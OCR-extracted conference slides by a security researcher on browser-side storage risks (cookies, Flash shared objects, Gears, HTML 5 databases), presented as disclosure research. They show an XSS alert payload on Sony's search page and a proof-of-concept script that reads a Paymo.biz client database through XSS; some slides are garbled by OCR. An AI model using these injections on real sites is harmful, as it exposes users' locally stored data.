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Who Am I? 



Company 



• Zscaler - SaaS solution for web browser security 

• VP, Security Research 



Background 



• SPI Dynamics - acquired by HP 

• iDefense- acquired by VeriSign 




• Web security 

• Client-side vulnerabilities 

• Fuzzing 
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Overview 



Background 



Data Privacy 



• HTTP Cookies 

• Flash Local SharedObjects 



Data Integrity and Confidentiality 



Gears 

HTML 5 Structured Client Side Storage 



Future 
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Background 
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Evolution of Web Applications 



Largely static, site generated content 
Web 1.0 


Dynamic, user 
generated content 


Offline web 




Web 2.0 


applications 






Web 3.0 

^ ' 



2000 2001 2002 2003 2004 2005 2006 2007 2008 2009. 



Time 
Warner/ 
AOL 
merger 



Dot com 

bubble 

bursts 



Google IPO 



O'Reilly Google 

Media Web Gears 

2.0 released 
Conference 



Safari 3.1 
supports 
HTML 5 
database 
storage 
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Browser Storage 




• Initially supported by Mosaic Netscape v0.9 beta - released Oct. 13, 1994 

• Internet Explorer v2.0 support in Oct. 1995 

• Primarily used for personalization/tracking 

• RFC 2109 recommends minimum storage capacity of 4KB per cookie 



Flash Local Shared Objects 



• First introduced in Flash Player 6.0 

• User controlled settings to manage 'Flash cookies' introduced in Flash Player 8.0 

• Default storage capacity of 100KB 



(Google) Gears 



• Launched May 31, 2007 

• Full local relational database 



HTML 5 Database Storage 



• Supported by Safari 3.1, released March 18, 2007 

• Full local relational database 
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HTTP Cookies 



lus-e Geafit4Runtihe v£r51pl IExternal 
use cbfExt v2r30Lp3 lExtcrn&L 
use rafiLfieoDbs vlrl£ 
use RflctPoLicy vSirlpE 
i-- t- p . ;. A -;_:■: 
use gecnetfy ir3rl 
iwe faciLities V2r7p2 
use jqnJ- v4r3pl 
us« HHiLUtiL v£ t -LDpE 
use idents vSrLOpl 
um defcJfodcL v2E:L4pL 
use Event tfQrll 
use CL«tSvc v^rLOpL 
use nicfioctData vErLLpS 
uae dLgLRootData vSrOpO 
use reconRootData v4r3p3 
use cewwnRoctData v0r2io2 



Linux 



If you've ever buili a TV set from scratchy you f ll love Linux 
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HTTP Cookies 




• Mosaic Netscape v0.9 beta - Oct. 13, 1994 

• Patented by Netscape in 1995 




• Primarily used for tracking 

• Allow sites to identify a combination of user, browser and computer 




• Restricted by same origin policy 

• RFC 2109 - HTTP State Management Mechanism 

• At least 4096 bytes per cookie 

• At least 20 cookies per unique host 

• Controllable expiration 




• Cookie hijacking 

• Cookie poisoning 
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Persistent csXSS 
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Sony Search 




Your Results for "Sutton" in All of Sony 



The Partridge Family » Up To Date | Legacy Recordings 

...Vocal Arrangement Ken Sharp - Liner Notes Ken Sharp - Project Coordinator Lisa Sutton 
- Liner Notes Lisa Sutton- Art Direction Lisa Sutton- Project Coordinator Beverly Weinstein 
-Art Direction Related Artists » Add... 

The Partridge Family * Shopping Bag | Legacy Recordings 

...String Arrangements Ken Sharp - Liner Notes Ken Sharp - Project Coordinator Lisa 
Sutton- Liner Notes Lisa Sutton- Artwork Lisa Sutton- Project Coordinator Beverly 
Weinstein - Artwork Boverly Weinstein - Art Direction... 



Your Recent Searches 



► Sutton 



► Michael 



The Partridge Family » Sound Magazine | Legacy Recordings 

...Mike Melvoin - String Arrangements Ken Sharp - Liner Notes Ken Sharp - Project 
Coordinator Lisa Sutton- Art Direction Lisa Sutton- Project Coordinator Beverly Weinstein 
-Art Direction Kenneth Lieu - Photography Kenneth... 




Fred Hammond » Somethin 1 Bout Love | Legacy Recordings 

...Ransum" Haggins - Vocal Producer Isaiah Abolin - Mixing Assistant Darius Fentress - 
Assistant Engineer Frank Sutton- Engineer Frank Sutton -Tracking Steve +, Supe" White - 
Arranger Steve "Supe" White- Producer Steve "Supe.,. 

Nick Hey ward I Legacy Recordings 

L I There was one error opening the page. For more information, choose Activity from the Window menu, 



Top Searches 
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Sony Persistent csXSS 



QSonvl 



J 



Website 

.sony.-corn 

.sony.-com 

.sony.-corn 

www.sony.com 

www.sony.coin 

www.sony.cofn 



Name 

s_vi 

&_cc 

N5C_xxx.tpo ' .dpn-mc-SO 

J5ES5IONID 

sonysearch_recent_searches 



Path 



/ 

/ 

/ 

/ 

/Sony5earch 

/Sony5earch 



Secure Expires 



Contents 



ft5B£SBB£5-Dft5D 
February LI, 2QL4 11:44AM [C5)vl|499451...0000296B|CE:i 

true 

449b23153660 
rini21LlQCl_^4 C8 5 6 . ap p 3 
Marcri 14, 2009 12:44 pm| Michael button 



Remove 

■-. 



Remove All 



( Done ^ 



A 
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Sony Persistent csXSS 



+ Register +Shop + Electronics + PlayStation H-Online Games +Music & Movies + Service & Suppo 




cj 




http://www.sony.com 

...is vulnerable to XSS 



C~tiT^ 



Your Results for "<script>alert("...is vulnerable to XSS")</script>" in All 
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Persistent csXSS 



Unique Aspects 



Persistent only on client 

Automatically triggered whenever page is revisited 



Attack Potential 



• Leverage for user-specific XSS attacks 

• Not possible with traditional persistent XSS 

• Inform attacker whenever you've returned to a site 

• Timing is an issue with attacks such as CSRF 




Prevalence 



Surprisingly common, especially on sites which feature a search history 
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Flash Local SharedObjects 
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Flash LSOs 




• Flash Player 6.0 - March 2002 

• Flash Player 8.0 - User controlled settings to manage 'Flash cookies' 




• Primarily used for tracking/default settings 

• Larger capacity permits use for additional purposes 

• Popular - my laptop currently has LSOs from 102 domains - all from regular browsing 




• Default storage of 100K -> can be unlimited 

• No expiration 

• Difficult to delete - not tied to browser caches 




• Cookie hijacking 

• Cookie poisoning 

• Data leakage 
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What's Stored in Flash LSO's? 



Tracking Identifiers 



• Most common 



Configuration Settings 



• Typical on audio/video streaming sites 



Authentication Credentials 



• Pandora (Encoded password) 



Easter Eggs 



• "Hey. You've just found another easter egg. Congrats - you gained nothing :)Y 
• Portal - Flash game by Armor Games 
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SharedObject Sandboxing 




Programming Adobe ActionScript 3.0 
for Adobe Flash 

SharedObjects 

Flash Player provides the ability to use shared objects, which are ActionScript objects that persist 
outside of a SWF file, either locally on a user's file system or remotely on an RTMP server. Shared 
objects, like other media in Flash Player, are partitioned into security sandboxes. However, the 
sandbox model for shared objects is somewhat different, because shared objects are not resources 
that can ever be accessed across domain boundaries. Instead, shared objects are always retrieved 
from a shared object store that is particular to the domain of each SWF file that calls methods of 
the SharedObject class. Usually a shared object store is even more particular than a SWF file's 
domain: by default, each SWF file uses a shared object store particular to its entire origin URL. 
evening. "We worked quickly to implement a fix for the issue recently reported in Orkut. We also 
took steps to help prevent similar problems in the future. Service to Orkut was not disrupted 
during this time." 
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Flash LSO Storage Locations 



Windows XP 



$user\Application Data\Macromedia\Flash Player\#SharedObjects. 



Windows Vista it is in each user's 



$user\AppData\Roaming\Macromedia\Flash Player\#SharedObjects. 




yLibrary/Preferences/Macromedia/Flash Player/#SharedObjects. 




/home/$user/.macromedia/Flash_Player/#SharedObjects. 
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LSO Files 




• Binary files 

• *.sol extension 

• Store text data 



SharedObject readers 



• FD3 

• SOLReader 



User Control 



• Website Storage Settings in Flash Player Settings Manager 

• Firefox add-ons - Objection, Better Privacy 
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Reading/Writing From/To Flash 

Cookies 



Limitations 



• Same origin policy 

• Origin determined by path 

• Sites can write LSO's at a predefined level (e.g. 

SharedObject . getLocal ("zscaler 



rr 



\\ 



/")) 



Requirements 



Ability to upload SWF files 

• Increasingly common on Web 2.0 sites 

Victim must visit site with uploaded content 
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Writing To a Flash Cookie 



package { 



import flash. net. SharedObject; 
import flash. display.Sprite; 

public class zscaler extends Sprite { 
private var usenSharedObject; 
private var firstname :String; 
private var lastname:String; 
public function zscalerQ { 

user = SharedObject. getLocal("zscaler"); 
firstname = "Michael"; 
lastname = "Sutton"; 

user.data.firstname = firstname; 
user.data. lastname = lastname; 

user.flushQ; 
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Reading From a Flash Cookie 



public function zscalerQ { 
var labekTextField; 

user = SharedObject.getLocal("zscaler"); 

firstname = user, data .first name; 
lastname = user.data.lastname; 

label = newTextFieldQ; 

label. autoSize = TextFieldAutoSize.LEFT; 

label. background = true; 

label. border = true; 

label.text = "Firstname: " + firstname + "\nLastname: " + lastname; 

addChild(label); 

user.flush(); 
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Reading From a Flash Cookie 



thrtp://michaelawsutto... ges.com/ zscaler.html 
9 http://michaelawsutton.googlepages.co m Or Google 



» 



Address EookT BonjourT SafeCharjnel...nvironmcnt 
http:/ / michaclawsutton.go. .. 



» 



Flrstnamc: Michael 
LastJiame: Sutton 
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Pros/Cons of Flash Cookies 




• Model increases complexity of cookie stealing 

• Sandboxing limits scope of attacks - similar to HTTP 
cookies 




• Greater default storage capacity (100KB) - increases 
likelihood that storage will be used for sensitive data 

• Difficult to delete 

• No expiration 
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(Google) Gears 
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Gears 




• Launched as Google Gears on May 31, 2007 

• 'Google' dropped from project title on 1 st anniversary 




• Initial - "offline-enabling applications" 

• Overall - "close the gap between web apps and native apps by giving the browser new capabilities" 




• Primary components: 

• LocalServer- Local HTTP/HTTPS capable server for delivering content 

• Database - Local implementation of SQLite relational database for storing content 

• WorkerPool - Run resource intensive JavaScript in the background to improve performance 




• Data confidentiality 

• Data integrity 
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Gears Activation 





Allow 

A 










• User must permit Gears access 



Install 



• SQLite database installed on local 
file system 



http BO 

r — 



File Edit View Favorites Tools Help 
Q Back - ) Search 



Folders 



Gears Security Warning 



The website below wants to store information on 
your computer using Gears. 



http: zscaler.paymo. biz 



yj I trust this site. Allow it to use Gears. 



Never allow this site 



Allow Deny 



Folder Sync 



Address 
Name 



^ C:\Docurnents and Settings\Administrator\Local Settings\ Application Data\Mozilla\Firefox\Profiles\c9doqcvk.default\Google v 



/' 



Go 



!dot_store_http zscalerjpaymo_biz_client_2_0_client_html[l]#localserver 

^ dot_store_http zscalerjDaymo_biz_client_2_0_client_html#database 



Size Type 

File Folder 
6 KB File 



Date Modified 
2/4/2009 2:07 AM 
2/4/2009 2:09 AM 
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Gears Storage Locations 




•Internet Explorer: C:\Documents and Settings\<user>\Local Settings\Application Data\Google\Google Gears for Internet 

Explorer 
•Firefox: C:\Documents and Settings\<user>\Local Settings\Application Data\Mozilla\Firefox\Profiles\{PROFILE}. default 

\Google Gears for Firefox 
•Google Chrome: C:\Documents and Settings\<user>\Local Settings\Application Data\Google\Chrome\User Data\Default 

\Plugin Data\Google Gears 




•Internet Explorer: C:\Users\<user>\AppData\LocalLow\Google\Google Gears for Internet Explorer 
•Firefox: C:\Users\<user>\AppData\Local\Mozilla\Firefox\Profiles\{PROFILE}.default\Google Gears for Firefox 
•Google Chrome C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Plugin Data\Google Gears 




•FirefoxUsers/<user>/Library/Caches/Firefox/Profiles/{PROFILE}. default/Google Gears for Firefox 
•Safari: "/Library/Application Support/Google/Google Gears for Safari 




•Firefox: <user>/.mozilla/firefox/{PROFILE}. default/Google Gears for Firefox 




►Mobile Internet Explorer: \Application Data\Google\Google Gears for Internet Explorer 
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csSQLi 
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csSQLi 




Ability to read/write to/from a database stored on a client machine 




• Browser databases are accessed via JavaScript 

• XSS on a vulnerable site can expose any web browser to csSQLi, 
regardless of patch level 




• Gears 
•HTML 5 
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A Big Thank You To Paymo.biz 





Timeline 










• Feb 4 - Vulnerability reported to Paymo.biz 




• Feb. 5 - Initial response requesting additional information 


• Feb. 5-9- Additional Correspondence 


• Feb. 9 - Fix implemented 



Thank You 



Paymo went out of their way quickly respond to the reported 
vulnerability in order to protect their clients. They were gracious and 
a pleasure to work with. Web application vendors everywhere can 
learn from their example. 

...and they offered a free year of service! How's that for gratitude. 
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Paymo Injection Point 



<h2>SQLi</h2> 

<p><strong>Client</strong> 

<a href="/clients/view/?id=16392">Default Client</a></p> 

<p>***injection_point***</p> 

<div style="f loat : left; padding-bottom: 10px;"> 



Injection point 



• Within paragraph tag 

• Tag will need to be closed </p> 




SCALER 



Twitter Questions: zscaler sutton 



Copyright 2009 Zscaler, Inc. 



Read Paymo Data 



m 



</p> 

<script type="text/ javascript" 

src="http: //code. google. com/apis/gears/gears_init. js"x/script> 
< script type= " text / javascript "> 
var db = google . gears . factory . create ( 'beta . database ') ; 
db . open ( ' dot store htt p zscaler paymo biz client 2 client html ' ) 
var data; 

var rs = db . execute (' SELECT * FROM DO JO_STORAGE ' ) ; 

while (rs . isValidRow ( ) ) { 

data = data + (rs.field(O) + ' @ ' + rs . field (1) ) ; 

data = data + '\n'; 

rs.next(); ^ 

} m m Close paragraph tag 

alert (data) ; 
rs . close ( ) ; 
</script> 
<p> 



e 



Include Gears API 



^yOpe 

« 



n existing local database 



Execute SQL query 
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Paymo csSQLi 



& 



Search 



Settings | Logout 



pfiymo 

\^Tinnetracker 



[Ki;IiIh>hihI Clients 



Re|>mts 



Invoices 

BETA 



Useis Timei 



The page at http://zscdLer.pdynio.bJz says: 



undefined_dot@oldVersion 

_dot@justDebugged 

default@sessionId 

default@userInfo 

default@projects 

default@entries_Wed_Feb_04_2009_00_00_00_GMT_0000_GMT_Standard_Time_ 

default@Wed_FebJ)4^ 

default@Sun_Feb_01_2009_00_00_00_GMT_0000_GMT_Standard_Time_Wed_Feb_04_2009_23_59_59_GMT_0000_GM 

default@time_trackjed_today 

default@time_trackjed_this_week 

default@company_logo 



OK 



■_ —■' 
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Gears csSQLi 



Bulitln SQLi Protection 



Secure -¥ db.execute('insert into MyTable values 
(?)', data); 

Insecure -> db.execute('insert into MyTable values 
(' + data + T); 



Meaningless if a site is vulnerable to XSS 



67% of sites likely to have XSS [Whitehat Security - 
December 2008] 
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SQLi vs csSQLi 



SQLi 



csSQLi 




Identify database structure 

through verbose error messages 

or brute force 



Database structure is readily 
accessible 



Online attacks 



Online and offline attacks 



SQL statement must be 
vulnerable 



XSS makes any site vulnerable, 
regardless of SQL syntax 
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csSQLi vs Cookie Theft 




• Couldn't I access the same information by stealing a user's cookie and 
accessing their online data? 




• Cookie theft does not guarantee data access 

• Site may not use cookies for authentication 

• Additional ACLs (i.e. IP source address) would prevent access 

• Session credentials have expired or user has logged out 

• Offline data does not have to mirror online data 




• No 
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Sites Using Gears 



Go ode 

Reader £j 



passpacKii 




so<*\e4ui*gs 



WordPress 



1£>M0 



Writer 



ii mindmcister 



YI Pflymo 

^^timetracker 




remember 

the m>IU" BETA 



&BUXFER 



Gm il 

by Google BETA 
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Pros/Cons of Gears 




Requires explicit user acceptance 

Has built in protections for vulnerabilities such as SQLi 





Cons 










• Despite default protections, being JavaScript based, it is open to 
attack should injection flaws such as XSS exist in the host application 

• Implementing a secure technology on an insecure site invalidates the 
built in protections 

• Increases the attack surface 

• csSQLi is a reality - Data can be remotely accessed from a local 
relational database 
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HTML 5 

Structured Client Side Storage 
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HTML 5 




WHATWG began work on specification in 2004 

W3C published first public working draft Jan. 22, 2008 




New markup, APIs, error handling, etc. 

Includes section on Structured Client-Side Storage 




• Session Storage - Similar to HTTP session cookies with greater flexibility 

• Local Storage - Similar to HTTP persistent cookies with greater flexibility 

• Database Storage- Local relational database 




Data confidentiality 
Data integrity 
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HTML 5 Browser DB Support 



♦ Internet Explorer 8 



• Supports session storage and local storage, not database storage 




• Supports session storage and local storage, not database storage 




Full support 




No HTML 5 support 



♦ Chrome 



• "Despite using the latest branch of.. .the local database features didn't make it into Chrome's first release. 
Chrome's isolated sandbox system. ..would break the built-in WebKit database 
functionality.. ." [monkey_bites] 
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HTML 5 Database Storage Locations 



Mac OS X 



/Users/[username]/Library/Safari/ 
Databases 



Others 



Currently, Webkit based browsers are the 
only ones supporting HTML Database 
Storage 
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HTML5csSQLi 



Resources 



Paper by Alberto Trivero describes potential abuse of HTML 
5 structured client side storage 

http://trivero.secdiscover.com/html5whitepaper.pdf 

Various issues covered including csSQLi via XSS 

• Same overall issue as demonstrated in Paymo.biz example 



Gears vs. HTML 5 



• Blog postings from Google indicate a desire to ultimately 
make Gears compatible with the HTML 5 specification 
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Comparison of Local Storage 

Technologies 





HTTP Cookies 


Flash LSOs 


Gears 


HTML 5 


Explicit 
Acceptance 


No 


No 


Yes 


No 


Storage Limit 


4KB 


Unlimited 
(100KB default) 


Unlimited 


Unlimited 


Expiry 


Custom 


Never 


Never 


Never 


File Format 


Text 


Binary 


Binary (SQLite) 


Binary (SQLite) 


Deployment 


Universal 


Near universal 


Minimal 


Beta only 
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How Gears and HTML 5 Change the 

Game for Attackers 





Offline 










• Targets can be attacked regardless of current Internet connectivity 
• e.g. Offline - Phishing email read while from Gmail, linked clicked and Gears 
enabled application attacked 




• No need to determine data structure for SQLi - everyone has it 



Attack surface 



• Potentially confidential data moves from a single, centralized location 
(server) to potentially millions of individual locations (client) 

• All targets (clients) can be attacked from one location (web app w/ XSS vuln.) 
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Predictions 




• Expect increased adoption of Gears thanks to favorable exposure from Gmail 
integration 

• HTML 5 and Gears are unlikely to compete - Google has already expressed a 
desire to make Gears compatible with the HTML 5 specification 



Vulnerable Sites 



Sites will continue to push the limits of widely adopted technologies such as HTTP 
cookies and Flash LSOs, resulting in exploitable vulnerabilities 

A significant portion of sites adopting local database technologies will have 
injection flaws that leave them open to attack 




Attack prevalence will increase in proportion to adoption rates 
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Questions? 



1 va"IL us* 6oof1t lotfb^f asbng JvoMa ^v<i+iwL 1 uhLL us* frooflt l&efbr* 
aiLtv^ Ji^Jb ^utstlChS. 1 MkliLl yj* 6009k lo*fbf t asbrvgt d^tila ^PtsfiOhS. 
1 whli us* &OG^1t lotfbr* asb'ng Jv^ik qWi+lOhix 1 wflU us* &GQ^1t lacfb^f 
aibrvCf Jw^J& ^yestiohs. 1 MJiLl yi* <?opg(c lo*fbrt aibfv} duplet questions. 
niiiML«rkw H rt!i.hI lacfbrt asb'ng Ju^it qutitiohL 1 uaLL us* freo^lt lacfbr* 
aibih^ difftlb ^pestichs. I mill us* <»egJ* lo*fb^t asbh/9 dvto^ ^estiohs. 
1 wftli us* 6eef1t lacfbrt asbng dy-wk, qv*J+lC*\L I uiklL us* t^ootft^^^t 
asbh^ cfwJ& ^MCstlOhS. 1 mill uSi <»egi* Ia*fb^t asbtv^ rfu^l& h^v 
1 vaU us* 6oof1t lacfbrt asbhg dv#i1a qvtiiiohL 1 uhLL us* &OM 1- 
iikifvCf Jv*J& ^pcstiohs. 1 HiiLl unt -froogf* la*fbrt asbhg tJu*il& « 
1 vaIL us* 6oo^1 1 lacfbn ftsb'hg Ju*tt qv*rK«\ir I MhlL us* 600^1%^ 
asbfrf dutalb ^uestiOhS. I uiiH us* -&OPg(* laffbrt asbtv} duAib jw*s 



■u- 



Michael Sutton - VP, Security Research 

http://research.zscaler.com 

Michael.Sutton@zscaler.com 
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